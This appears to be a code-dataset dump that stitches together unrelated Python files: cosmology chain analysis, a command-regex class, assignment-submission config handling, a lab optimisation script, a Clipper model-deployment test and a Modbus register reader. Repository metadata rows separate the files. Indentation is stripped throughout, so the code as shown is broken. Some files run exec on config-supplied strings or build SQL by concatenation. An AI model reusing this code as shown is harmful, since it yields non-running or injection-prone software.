# Remove fixed fraction as requested by user (usually not useful if non-markovian is also removed)
if info.keep_fraction < 1:
start = start + int((1.-info.keep_fraction)*(line_count - start))
print ": Removed",
if info.markovian:
print "%d non-markovian points," % markovian,
print "%d points of burn-in," % burnin,
if info.keep_fraction < 1:
print "and first %.0f percent," % (100.*(1-info.keep_fraction)),
print "keep %d steps" % (line_count-start)
except IndexError:
print ': Removed everything: chain not converged'
# ham contains cheese without the burn-in, if there are any points
# left (more than 5)
if np.shape(cheese)[0] > start+5:
ham = np.copy(cheese[int(start)::])
# Deal with single file case
if len(info.files) == 1:
warnings.warn("Convergence computed for a single file")
bacon = np.copy(cheese[::3, :])
egg = np.copy(cheese[1::3, :])
sausage = np.copy(cheese[2::3, :])
spam.append(bacon)
spam.append(egg)
spam.append(sausage)
continue
# Adding resulting table to spam
spam.append(ham)
# Test the length of the list
if len(spam) == 0:
raise io_mp.AnalyzeError(
"No decently sized chain was found. " +
"Please wait a bit to analyze this folder")
# Now applying the new rules for scales, if the name is contained in the
# referenced names
for name in info.new_scales.iterkeys():
try:
index = info.ref_names.index(name)
for i in xrange(len(spam)):
spam[i][:, index+2] *= 1./info.scales[index, index]
except ValueError:
# there is nothing to do if the name is not contained in ref_names
pass
info.steps = steps
info.accepted_steps = accepted_steps
return spam
def compute_mean(mean, spam, total):
"""
"""
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
submean = np.sum(spam[j][:, 0]*spam[j][:, i+2])
mean[j+1, i] = submean / total[j+1]
mean[0, i] += submean
mean[0, i] /= total[0]
def compute_variance(var, mean, spam, total):
"""
"""
for i in xrange(np.shape(var)[1]):
for j in xrange(len(spam)):
var[0, i] += np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[0, i])**2)
var[j+1, i] = np.sum(
spam[j][:, 0]*(spam[j][:, i+2]-mean[j+1, i])**2) / \
(total[j+1]-1)
var[0, i] /= (total[0]-1)
def compute_covariance_matrix(info):
"""
"""
covar = np.zeros((len(info.ref_names), len(info.ref_names)))
for i in xrange(len(info.ref_names)):
for j in xrange(i, len(info.ref_names)):
covar[i, j] = (
info.chain[:, 0]*(
(info.chain[:, i+2]-info.mean[i]) *
(info.chain[:, j+2]-info.mean[j]))).sum()
if i != j:
covar[j, i] = covar[i, j]
covar /= info.total
# Removing scale factors in order to store true parameter covariance
covar = np.dot(info.scales.T, np.dot(covar, info.scales))
return covar
def adjust_ticks(param, information_instances):
"""
"""
if len(information_instances) == 1:
return
# Recovering all x_range and ticks entries from the concerned information
# instances
x_ranges = []
ticks = []
for info in information_instances:
if not info.ignore_param:
x_ranges.append(info.x_range[info.native_index])
ticks.append(info.ticks[info.native_index])
# The new x_range and tick should min/max all the existing ones
new_x_range = np.array(
[min([e[0] for e in x_ranges]), max([e[1] for e in x_ranges])])
temp_ticks = np.array(
[min([e[0] for e in ticks]), max([e[-1] for e in ticks])])
new_ticks = np.linspace(temp_ticks[0],
temp_ticks[1],
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = new_x_range
info.ticks[info.native_index] = new_ticks
def store_contour_coordinates(info, name1, name2, contours):
"""docstring"""
file_name = os.path.join(
info.folder, 'plots', '{0}_2d_{1}-{2}.dat'.format(
info.basename, name1, name2))
with open(file_name, 'w') as plot_file:
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[1]))
for elem in contours.collections[0].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
# stop to not include the inner contours
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
plot_file.write(
'# contour for confidence level {0}\n'.format(
info.levels[0]))
for elem in contours.collections[1].get_paths():
points = elem.vertices
for k in range(np.shape(points)[0]):
plot_file.write("%.8g\t %.8g\n" % (
points[k, 0], points[k, 1]))
if k != 0:
if all(points[k] == points[0]):
plot_file.write("\n")
break
plot_file.write("\n\n")
def iscomment(s):
"""
Define what we call a comment in MontePython chain files
"""
return s.startswith('#')
class Information(object):
"""
Hold all information for analyzing runs
"""
# Counting the number of instances, to choose the color map
_ids = count(0)
# Flag checking the absence or presence of the interp1d function
has_interpolate_module = False
# Actual pairs of colors used by MP.
# For each pair, the first color is for the 95% contour,
# and the second for the 68% contour + the 1d probability.
# Note that, as with the other customisation options, you can specify new
# values for this in the extra plot_file.
MP_color = {
'Red':['#E37C80','#CE121F'],
'Blue':['#7A98F6','#1157EF'],
'Green':['#88B27A','#297C09'],
'Orange':['#F3BE82','#ED920F'],
'Grey':['#ABABAB','#737373'],
'Purple':['#B87294','#88004C']
}
# order used when several directories are analysed
MP_color_cycle = [
MP_color['Red'],
MP_color['Blue'],
MP_color['Green'],
MP_color['Orange'],
MP_color['Grey'],
MP_color['Purple']
]
# in the same order, list of transparency levels
alphas = [0.9, 0.9, 0.9, 0.9, 0.9, 0.9]
def __init__(self, command_line, other=None):
"""
The following initialization creates the three tables that can be
customized in an extra plot_file (see :mod:`parser_mp`).
Parameters
----------
command_line : Namespace
it contains the initialised command line arguments
"""
self.to_change = {}
"""
Dictionary whose keys are the old parameter names, and values are the
new ones. For instance :code:`{'beta_plus_lambda':'beta+lambda'}`
"""
self.to_plot = []
"""
Array of names of parameters to plot. If left empty, all will be
plotted.
.. warning::
If you changed a parameter name with :attr:`to_change`, you need to
give the new name to this array
"""
self.new_scales = {}
"""
Dictionary that redefines some scales. The keys will be the parameter
name, and the value its scale.
"""
# Assign a unique id to this instance
self.id = self._ids.next()
# Defining the sigma contours (1, 2 and 3-sigma)
self.levels = np.array([68.26, 95.4, 99.7])/100.
# Follows a bunch of initialisation to provide default members
self.ref_names, self.backup_names = [], []
self.scales, self.plotted_parameters = [], []
self.spam = []
# Store directly all information from the command_line object into this
# instance, except the protected members (begin and end with __)
for elem in dir(command_line):
if elem.find('__') == -1:
setattr(self, elem, getattr(command_line, elem))
# initialise the legend flags
self.plot_legend_1d = None
self.plot_legend_2d = None
# initialize the legend size to be the same as fontsize, but can be
# altered in the extra file
self.legendsize = self.fontsize
self.legendnames = []
# initialize the customisation script flags
self.custom1d = []
self.custom2d = []
# initialise the dictionary enforcing limits
self.force_limits = {}
# Read a potential file describing changes to be done for the parameter
# names, and number of parameters plotted (can be left empty, all will
# then be plotted), but also the style of the plot. Note that this
# overrides the command line options
if command_line.optional_plot_file:
plot_file_vars = {'info': self,'plt': plt}
execfile(command_line.optional_plot_file, plot_file_vars)
# check and store keep_fraction
if command_line.keep_fraction<=0 or command_line.keep_fraction>1:
raise io_mp.AnalyzeError("after --keep-fraction you should pass a float >0 and <=1")
self.keep_fraction = command_line.keep_fraction
def remap_parameters(self, spam):
"""
Perform substitutions of parameters for analyzing
.. note::
for arbitrary combinations of parameters, the prior will not
necessarily be flat.
"""
if hasattr(self, 'redefine'):
for key, value in self.redefine.iteritems():
# Check that the key was an original name
if key in self.backup_names:
print ' /|\ Transforming', key, 'into', value
# We recover the indices of the key
index_to_change = self.backup_names.index(key)+2
print('/_o_\ The new variable will be called ' +
self.ref_names[self.backup_names.index(key)])
# Recover all indices of all variables present in the
# remapping
variable_names = [elem for elem in self.backup_names if
value.find(elem) != -1]
indices = [self.backup_names.index(name)+2 for name in
variable_names]
# Now loop over all files in spam
for i in xrange(len(spam)):
# Assign variables to their values
for index, name in zip(indices, variable_names):
exec("%s = spam[i][:, %i]" % (name, index))
# Assign to the desired index the combination
exec("spam[i][:, %i] = %s" % (index_to_change, value))
def define_ticks(self):
"""
"""
self.max_values = self.chain[:, 2:].max(axis=0)
self.min_values = self.chain[:, 2:].min(axis=0)
self.span = (self.max_values-self.min_values)
# Define the place of ticks, given the number of ticks desired, stored
# in conf.ticknumber
self.ticks = np.array(
[np.linspace(self.min_values[i]+self.span[i]*0.1,
self.max_values[i]-self.span[i]*0.1,
self.ticknumber) for i in range(len(self.span))])
# Define the x range (ticks start not exactly at the range boundary to
# avoid display issues)
self.x_range = np.array((self.min_values, self.max_values)).T
# In case the exploration hit a boundary (as defined in the parameter
# file), at the level of precision defined by the number of bins, the
# ticks and x_range should be altered in order to display this
# meaningful number instead.
for i in range(np.shape(self.ticks)[0]):
x_range = self.x_range[i]
bounds = self.boundaries[i]
# Left boundary
if bounds[0] is not None:
if abs(x_range[0]-bounds[0]) < self.span[i]/self.bins:
self.ticks[i][0] = bounds[0]
self.x_range[i][0] = bounds[0]
# Right boundary
if bounds[-1] is not None:
if abs(x_range[-1]-bounds[-1]) < self.span[i]/self.bins:
self.ticks[i][-1] = bounds[-1]
self.x_range[i][-1] = bounds[-1]
def write_information_files(self):
# Store in info_names only the tex_names that were plotted, for this
# instance, and in indices the corresponding list of indices. It also
# removes the $ signs, for clarity
self.info_names = [
name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.indices = [self.tex_names.index(name) for name in self.info_names]
self.tex_names = [name for index, name in enumerate(self.tex_names) if
self.ref_names[index] in self.plotted_parameters]
self.info_names = [name.replace('$', '') for name in self.info_names]
# Define the bestfit array
self.bestfit = np.zeros(len(self.ref_names))
for i in xrange(len(self.ref_names)):
self.bestfit[i] = self.chain[self.sorted_indices[0], :][2+i]
# Write down to the .h_info file all necessary information
self.write_h_info()
self.write_v_info()
self.write_tex()
def write_h_info(self):
with open(self.h_info_path, 'w') as h_info:
h_info.write(' param names\t: ')
for name in self.info_names:
h_info.write("%-14s" % name)
write_h(h_info, self.indices, 'R-1 values', '% .6f', self.R)
write_h(h_info, self.indices, 'Best Fit ', '% .6e', self.bestfit)
write_h(h_info, self.indices, 'mean ', '% .6e', self.mean)
write_h(h_info, self.indices, 'sigma ', '% .6e',
(self.bounds[:, 0, 1]-self.bounds[:, 0, 0])/2.)
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma - ', '% .6e',
self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma + ', '% .6e',
self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma - ', '% .6e',
self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma + ', '% .6e',
self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma - ', '% .6e',
self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma + ', '% .6e',
self.bounds[:, 2, 1])
# bounds
h_info.write('\n')
write_h(h_info, self.indices, '1-sigma > ', '% .6e',
self.mean+self.bounds[:, 0, 0])
write_h(h_info, self.indices, '1-sigma < ', '% .6e',
self.mean+self.bounds[:, 0, 1])
write_h(h_info, self.indices, '2-sigma > ', '% .6e',
self.mean+self.bounds[:, 1, 0])
write_h(h_info, self.indices, '2-sigma < ', '% .6e',
self.mean+self.bounds[:, 1, 1])
write_h(h_info, self.indices, '3-sigma > ', '% .6e',
self.mean+self.bounds[:, 2, 0])
write_h(h_info, self.indices, '3-sigma < ', '% .6e',
self.mean+self.bounds[:, 2, 1])
def write_v_info(self):
"""Write vertical info file"""
with open(self.v_info_path, 'w') as v_info:
v_info.write('%-15s\t: %-11s' % ('param names', 'R-1'))
v_info.write(' '.join(['%-11s' % elem for elem in [
'Best fit', 'mean', 'sigma', '1-sigma -', '1-sigma +',
'2-sigma -', '2-sigma +', '1-sigma >', '1-sigma <',
'2-sigma >', '2-sigma <']]))
for index, name in zip(self.indices, self.info_names):
v_info.write('\n%-15s\t: % .4e' % (name, self.R[index]))
v_info.write(' '.join(['% .4e' % elem for elem in [
self.bestfit[index], self.mean[index],
(self.bounds[index, 0, 1]-self.bounds[index, 0, 0])/2.,
self.bounds[index, 0, 0], self.bounds[index, 0, 1],
self.bounds[index, 1, 0], self.bounds[index, 1, 1],
self.mean[index]+self.bounds[index, 0, 0],
self.mean[index]+self.bounds[index, 0, 1],
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]]]))
def write_tex(self):
"""Write a tex table containing the main results """
with open(self.tex_path, 'w') as tex:
tex.write("\\begin{tabular}{|l|c|c|c|c|} \n \\hline \n")
tex.write("Param & best-fit & mean$\pm\sigma$ ")
tex.write("& 95\% lower & 95\% upper \\\\ \\hline \n")
for index, name in zip(self.indices, self.tex_names):
tex.write("%s &" % name)
tex.write("$%.4g$ & $%.4g_{%.2g}^{+%.2g}$ " % (
self.bestfit[index], self.mean[index],
self.bounds[index, 0, 0], self.bounds[index, 0, 1]))
tex.write("& $%.4g$ & $%.4g$ \\\\ \n" % (
self.mean[index]+self.bounds[index, 1, 0],
self.mean[index]+self.bounds[index, 1, 1]))
tex.write("\\hline \n \\end{tabular} \\\\ \n")
tex.write("$-\ln{\cal L}_\mathrm{min} =%.6g$, " % (
self.min_minus_lkl))
tex.write("minimum $\chi^2=%.4g$ \\\\ \n" % (
self.min_minus_lkl*2.))
|
mit
| 3,279,992,004,840,234,500 | 43.253259 | 153 | 0.52346 | false | 4.247743 | false | false | false |
call-me-jimi/hq
|
hq/lib/hQCommand.py
|
1
|
1329
|
import re
class hQCommand( object ):
"""! @brief Command """
def __init__( self,
name,
regExp,
arguments = [],
permission = None,
fct = None,
help = "",
fullhelp = "" ):
self.name = name
self.arguments = arguments
self.re = re.compile(regExp)
self.permission = permission
self.fct = fct
self.help = help
self.fullhelp = fullhelp
def match( self, command_str ):
"""! @brief match regExp agains command_str """
return self.re.match( command_str )
def groups( self, command_str ):
"""! @brief return groups in regular expression """
match = self.re.match( command_str )
if match:
return match.groups()
else:
return None
def get_command_str( self ):
"""! @brief return command string """
s = self.name
for a in self.arguments:
s += ":<{A}>".format(A=a.upper())
return s
def get_fullhelp( self ):
"""! @brief return fullhelp or, if not given, help """
if self.fullhelp:
return self.fullhelp
else:
return self.help
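# Minimal usage sketch (added comment, not part of the original module; the
# command name and regular expression below are made-up examples):
#
#   cmd = hQCommand(name="status",
#                   regExp="^status:(\w+)$",
#                   arguments=["job_id"],
#                   help="show status of a job")
#   cmd.match("status:1234")        # -> a match object
#   cmd.groups("status:1234")       # -> ('1234',)
#   cmd.get_command_str()           # -> 'status:<JOB_ID>'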
|
gpl-2.0
| 594,055,388,762,925,400 | 24.075472 | 62 | 0.470278 | false | 4.489865 | false | false | false |
cojocar/vmchecker
|
vmchecker/submissions.py
|
1
|
4960
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import with_statement
import ConfigParser
import os
import time
import datetime
import logging
from .config import DATE_FORMAT
from . import paths
_logger = logging.getLogger('vmchecker.submissions')
def get_time_struct_from_str(time_str):
"""Returns a time_struct object from the time_str string given"""
time_struct = time.strptime(time_str, DATE_FORMAT)
return time_struct
def get_datetime_from_time_struct(time_struct):
"""Returns a datetime object from time time_struct given"""
return datetime.datetime(*time_struct[:6])
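# Usage sketch (added comment, illustrative only; the actual DATE_FORMAT string
# lives in vmchecker.config and is not reproduced here):
#   ts = get_time_struct_from_str(upload_time_string)
#   dt = get_datetime_from_time_struct(ts)  # datetime built from the first six fields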
class Submissions:
"""A class to manipulate submissions from a given repository"""
def __init__(self, vmpaths):
"""Create a Submissions class. vmpaths is a
vmchecker.paths.VmcheckerPaths object holding information
about one course configuration."""
self.vmpaths = vmpaths
def _get_submission_config_fname(self, assignment, user):
"""Returns the last submissions's configuration file name for
the given user for the given assignment.
If the config file cannot be found, returns None.
"""
sbroot = self.vmpaths.dir_cur_submission_root(assignment, user)
if not os.path.isdir(sbroot):
return None
config_file = paths.submission_config_file(sbroot)
if not os.path.isfile(config_file):
_logger.warn('%s found, but config (%s) is missing',
sbroot, config_file)
return None
return config_file
def _get_submission_config(self, assignment, user):
"""Returns a ConfigParser for the last submissions's
configuration file name for the given user for the given
assignment.
If the config file cannot be found, returns None.
"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
return hrc
def get_upload_time_str(self, assignment, user):
"""Returns a string representing the user's last submission date"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
return hrc.get('Assignment', 'UploadTime')
def get_eval_queueing_time_str(self, assignment, user):
"""Returns a string representing the last time the submission
was queued for evaluation"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
if not hrc.has_option('Assignment', 'EvaluationQueueingTime'):
return None
return hrc.get('Assignment', 'EvaluationQueueingTime')
def get_upload_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
user's last submission"""
upload_time_str = self.get_upload_time_str(assignment, user)
return get_time_struct_from_str(upload_time_str)
def get_upload_time(self, assignment, user):
"""Returns a datetime object with the upload time of the
user's last submission"""
upload_time_struct = self.get_upload_time_struct(assignment, user)
return get_datetime_from_time_struct(upload_time_struct)
def get_eval_queueing_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
last evaluation queueing for the user's last submission"""
time_str = self.get_eval_queueing_time_str(assignment, user)
return get_time_struct_from_str(time_str)
def get_eval_queueing_time(self, assignment, user):
"""Returns a datetime object with the upload time of the last
evaluation queueing for the user's last submission"""
time_struct = self.get_eval_queueing_time_struct(assignment, user)
return get_datetime_from_time_struct(time_struct)
def set_eval_parameters(self, assignment, user, archive, eval_time):
"""Appends the archive filename to an existing
submission-config (used for Large type assignments)"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
hrc.set('Assignment', 'ArchiveFilename', archive)
hrc.set('Assignment', 'EvaluationQueueingTime', eval_time)
with open(config_file, "w") as handler:
hrc.write(handler)
def submission_exists(self, assignment, user):
"""Returns true if a valid submission exists for the given
user and assignment"""
return (self._get_submission_config(assignment, user) != None)
|
mit
| -8,193,271,641,474,638,000 | 32.513514 | 75 | 0.653831 | false | 4.178602 | true | false | false |
budnyjj/bsuir_magistracy
|
disciplines/OTOS/lab_1/lab.py
|
1
|
1813
|
#!/usr/bin/env python
import functools
import math
import random
import numpy as np
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# 1D model
def model(x):
a = 2.7; d = 0.1; y_0 = 2
sigma = 0.001
result = y_0 - 0.04 * (x - a) - d * (x - a)**2
return result + random.gauss(0, sigma)
def search_asymmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
def search_symmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x - alpha))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
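# Added note: the two routines above appear to be Kiefer-Wolfowitz style
# stochastic approximation searches; the asymmetric variant estimates the
# gradient from a one-sided finite difference, the symmetric one from a
# two-sided difference, with probe size alpha_k ~ (k+1)^(-1/3) and gain
# factor ~ (k+1)^(-2/3).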
NUM_ITER = 1000
MIN_X = 1; MAX_X = 10; NUM_X = 100
VALS_X = np.linspace(MIN_X, MAX_X, NUM_X)
model_vec = np.vectorize(model)
plt.plot(VALS_X, model_vec(VALS_X),
color='r', linestyle=' ',
marker='.', markersize=5,
label='model')
search_asymmetric_x = search_asymmetric(model, MAX_X, NUM_ITER)
plt.plot(search_asymmetric_x, model_vec(search_asymmetric_x),
color='g', marker='x', markersize=5,
label='asymmetric')
search_symmetric_x = search_symmetric(model, MAX_X, NUM_ITER)
plt.plot(search_symmetric_x, model_vec(search_symmetric_x),
color='b', marker='x', markersize=5,
label='symmetric')
plt.xlabel('$ x $')
plt.ylabel('$ y $')
plt.grid(True)
# plt.legend(loc=2)
plt.savefig('plot.png', dpi=200)
|
gpl-3.0
| 7,770,229,010,586,717,000 | 24.9 | 79 | 0.578047 | false | 2.681953 | false | false | false |
ucbrise/clipper
|
integration-tests/deploy_pytorch_to_caffe2_with_onnx.py
|
1
|
7042
|
from __future__ import absolute_import, print_function
import os
import sys
import requests
import json
import numpy as np
import time
import logging
cur_dir = os.path.dirname(os.path.abspath(__file__))
import torch
import torch.utils.data as data
from torch import nn, optim
from torch.autograd import Variable
import torch.nn.functional as F
from test_utils import (create_docker_connection, BenchmarkException, headers,
log_clipper_state)
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath("%s/../clipper_admin" % cur_dir))
from clipper_admin.deployers.onnx import deploy_pytorch_model, create_pytorch_endpoint
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
app_name = "caffe2-test"
model_name = "caffe2-model"
def normalize(x):
return x.astype(np.double) / 255.0
def objective(y, pos_label):
# prediction objective
if y == pos_label:
return 1
else:
return 0
def parsedata(train_path, pos_label):
trainData = np.genfromtxt(train_path, delimiter=',', dtype=int)
records = trainData[:, 1:]
labels = trainData[:, :1]
transformedlabels = [objective(ele, pos_label) for ele in labels]
return (records, transformedlabels)
def predict(model, inputs):
preds = model.run(np.array(inputs).astype(np.float32))
return [str(p) for p in preds[0]]
def deploy_and_test_model(clipper_conn,
model,
inputs,
version,
link_model=False,
predict_fn=predict):
deploy_pytorch_model(
clipper_conn,
model_name,
version,
"integers",
inputs,
predict_fn,
model,
onnx_backend="caffe2")
time.sleep(5)
if link_model:
clipper_conn.link_model_to_app(app_name, model_name)
time.sleep(5)
test_model(clipper_conn, app_name, version)
def test_model(clipper_conn, app, version):
time.sleep(25)
num_preds = 25
num_defaults = 0
addr = clipper_conn.get_query_addr()
for i in range(num_preds):
response = requests.post(
"http://%s/%s/predict" % (addr, app),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code == requests.codes.ok and result["default"]:
num_defaults += 1
elif response.status_code != requests.codes.ok:
logger.error(result)
raise BenchmarkException(response.text)
if num_defaults > 0:
logger.error("Error: %d/%d predictions were default" % (num_defaults,
num_preds))
if num_defaults > num_preds / 2:
raise BenchmarkException("Error querying APP %s, MODEL %s:%d" %
(app, model_name, version))
# Define a simple NN model
class BasicNN(nn.Module):
def __init__(self):
super(BasicNN, self).__init__()
self.net = nn.Linear(28 * 28, 2)
def forward(self, x):
if isinstance(x, np.ndarray):
x = torch.from_numpy(x)
x = x.float()
if isinstance(x, type(torch.randn(1))):
x = Variable(x)
x = x.view(1, 1, 28, 28)
x = x / 255.0
batch_size = x.size(0)
x = x.view(batch_size, -1)
output = self.net(x.float())
return F.softmax(output)
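# Added note: BasicNN assumes flattened 28x28 grayscale inputs (784 values,
# MNIST-style, see get_test_point below) scaled by 255, and produces a 2-class
# softmax; it is served through the ONNX/Caffe2 deployer used in
# deploy_and_test_model above.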
def train(model):
model.train()
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(10):
for i, d in enumerate(train_loader, 1):
image, j = d
optimizer.zero_grad()
output = model(image)
loss = F.cross_entropy(output,
Variable(
torch.LongTensor([train_y[i - 1]])))
loss.backward()
optimizer.step()
return model
def get_test_point():
return [np.random.randint(255) for _ in range(784)]
# Define a dataloader to read data
class TrainingDataset(data.Dataset):
def __init__(self, data, label):
self.imgs = data
self.classes = label
def __getitem__(self, index):
img = self.imgs[index]
label = self.classes[index]
img = torch.Tensor(img)
return img, torch.Tensor(label)
if __name__ == "__main__":
pos_label = 3
import random
cluster_name = "onnx-{}".format(random.randint(0, 5000))
try:
clipper_conn = create_docker_connection(
cleanup=False, start_clipper=True, new_name=cluster_name)
train_path = os.path.join(cur_dir, "data/train.data")
train_x, train_y = parsedata(train_path, pos_label)
train_x = normalize(train_x)
train_loader = TrainingDataset(train_x, train_y)
try:
clipper_conn.register_application(app_name, "integers",
"default_pred", 100000)
time.sleep(1)
addr = clipper_conn.get_query_addr()
response = requests.post(
"http://%s/%s/predict" % (addr, app_name),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code != requests.codes.ok:
logger.error("Error: %s" % response.text)
raise BenchmarkException("Error creating app %s" % app_name)
version = 1
model = BasicNN()
nn_model = train(model)
inputs = Variable(torch.randn(len(get_test_point())))
deploy_and_test_model(
clipper_conn, nn_model, inputs, version, link_model=True)
app_and_model_name = "easy-register-app-model"
create_pytorch_endpoint(
clipper_conn,
app_and_model_name,
"integers",
inputs,
predict,
nn_model,
onnx_backend="caffe2")
test_model(clipper_conn, app_and_model_name, 1)
except BenchmarkException:
sys.exit(1)
log_clipper_state(clipper_conn)
logger.exception("BenchmarkException")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
else:
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
except Exception:
logger.exception("Exception")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
|
apache-2.0
| 3,313,663,111,982,408,000 | 29.484848 | 86 | 0.557938 | false | 3.816802 | true | false | false |
dcneeme/droidcontroller
|
achannels.py
|
1
|
26311
|
# to be imported to access modbus registers as analogue io
# 03.04.2014 neeme
# 04.04.2014 it works, without periodical execution and without access by svc reg
# 06.04.2014 sequential register read for optimized reading, done
# 14.04.2014 mb[mbi] (multiple modbus connections) support. NOT READY!
# 16.04.2014 fixed mts problem, service messaging ok
from sqlgeneral import * # SQLgeneral / also provides time, mb, conn etc.
s=SQLgeneral() # sql connection
class Achannels(SQLgeneral): # handles aichannels and aochannels tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'aichannels.sql', out_sql = 'aochannels.sql', readperiod = 10, sendperiod = 30): # period for mb reading, renotify for udpsend
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.out_sql = out_sql.split('.')[0]
self.s = SQLgeneral()
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.sendperiod = invar
def sqlread(self,table):
self.s.sqlread(table) # read dichannels
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -150 # time of last reporting
self.sqlread(self.in_sql) # read aichannels
self.sqlread(self.out_sql) # read aochannels if exist
def read_ai_grp(self,mba,regadd,count,mbi=0): # using self,in_sql as the table to store in. mbi - modbus channel index
''' Read sequential register group and store raw into table self.in_sql. Inside transaction! '''
msg='reading data for aichannels group from mbi '+str(mbi)+', mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)
#print(msg) # debug
        if count > 0 and mba != 0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
else:
print('invalid parameters for read_ai_grp()!',mba,regadd,count)
return 2
if result != None:
try:
for i in range(count): # tuple to table rows. tuple len is twice count!
Cmd="UPDATE "+self.in_sql+" set raw='"+str(result[i])+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and mbi="+str(mbi)+" and regadd='"+str(regadd+i)+"'" # koigile korraga
#print(Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='ai grp data reading FAILED!'
print(msg)
return 1
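    # Usage sketch for read_ai_grp() (added comment; the numbers are illustrative
    # only): reading 4 consecutive holding registers of modbus address 1 on
    # channel 0 would be
    #   self.read_ai_grp(1, 256, 4, 0)
    # and the raw readings end up in the aichannels table, one row per register.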
def sync_ai(self): # analogue input readings to sqlite, to be executed regularly.
#global MBerr
mba=0
val_reg=''
mcount=0
        block=0 # error count
        #self.ts = time.time()
        ts_created=self.ts # use this as the service timestamp
value=0
ovalue=0
Cmd = ''
Cmd3= ''
cur = conn.cursor()
cur3 = conn.cursor()
bfirst=0
blast=0
bmba=0
bmbi=0
bcount=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # hoiab kinni kuni mb suhtlus kestab? teised seda ei kasuta samal ajal nagunii. iga tabel omaette.
conn.execute(Cmd)
#self.conn.execute(Cmd)
Cmd="select mba,regadd,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur:
mbi=int(row[2]) # niigi num
mba=int(row[0])
regadd=int(row[1])
if bfirst == 0:
bfirst = regadd
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst,'mbi',mbi) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+1: # sequential group still growing
blast = regadd
bcount=bcount+1
#print('ai group end shifted to',blast) # debug
else: # a new group started, make a query for previous
#print('ai group end detected at regadd',blast,'bcount',bcount) # debugb
#print('going to read ai registers from',bmbi,bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('ai group end detected at regadd',blast) # debugb
#print('going to read ai registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table
# raw updated for all aichannels
